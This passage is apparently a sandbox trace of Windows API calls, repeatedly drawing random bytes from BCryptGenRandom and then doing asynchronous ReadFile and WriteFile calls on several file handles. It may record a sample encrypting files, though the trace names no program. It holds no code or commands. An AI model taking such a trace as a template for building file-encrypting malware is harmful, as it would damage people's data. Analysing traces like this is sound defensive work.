(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.961] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.961] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.961] free (_Block=0x3e305b8) [0146.961] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.961] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.962] free (_Block=0x1fa91d0) [0146.962] free (_Block=0x1fa2ed8) [0146.962] free (_Block=0x1fa90b8) [0146.962] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.975] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.975] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.976] free (_Block=0x3e305b8) [0146.976] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.976] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.976] free (_Block=0x1fa91d0) [0146.976] free (_Block=0x1fa2ed8) [0146.976] free (_Block=0x1fa90b8) [0146.976] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.989] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.989] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.989] free (_Block=0x3e305b8) [0146.989] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.989] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.989] free (_Block=0x1fa91d0) [0146.989] free (_Block=0x1fa2ed8) [0146.990] free (_Block=0x1fa90b8) [0146.990] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.999] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.999] free (_Block=0x3e305b8) [0146.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.999] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.000] free (_Block=0x1fa91d0) [0147.000] free (_Block=0x1fa2ed8) [0147.000] free (_Block=0x1fa90b8) [0147.000] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.204] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.212] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.220] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.245] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3198, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.258] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2608, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.370] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6196, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.386] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x38d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.409] CloseHandle (hObject=0x170) returned 1 [0147.410] free (_Block=0x3e70008) [0147.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.422] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd902, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0147.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0147.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0147.456] free (_Block=0x3e305b8) [0147.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0147.456] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0147.456] free (_Block=0x1fa9400) [0147.456] free (_Block=0x77d7a8) [0147.456] free (_Block=0x1fa92e8) [0147.456] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0147.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.458] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x9080, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.632] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.643] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x5f50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.648] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.649] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.650] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.651] CloseHandle (hObject=0x308) returned 1 [0147.651] free (_Block=0x3f70048) [0147.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.720] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x745c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.741] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5f6e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.832] CloseHandle (hObject=0x2a8) returned 1 [0147.832] free (_Block=0x3d70450) [0147.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.833] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x62e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.834] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xe960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.838] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x99a2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.852] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x50b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.854] CloseHandle (hObject=0x3cc) returned 1 [0147.854] free (_Block=0x3df0008) [0147.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.863] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0147.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0147.864] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.865] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.865] free (_Block=0x3e305b8) [0147.865] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.865] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.865] free (_Block=0x1fa91d0) [0147.865] free (_Block=0x1fa2ed8) [0147.865] free (_Block=0x1fa90b8) [0147.865] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.867] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.880] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8420, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.881] CloseHandle (hObject=0x3cc) returned 1 [0147.882] free (_Block=0x3df0008) [0147.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0147.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0147.895] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.895] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.896] free (_Block=0x3e305b8) [0147.896] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.896] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.896] free (_Block=0x1fa91d0) [0147.896] free (_Block=0x1fa2ed8) [0147.896] free (_Block=0x1fa90b8) [0147.896] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.898] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.909] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x773a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0147.923] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8b8e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.924] GetQueuedCompletionStatus (in: 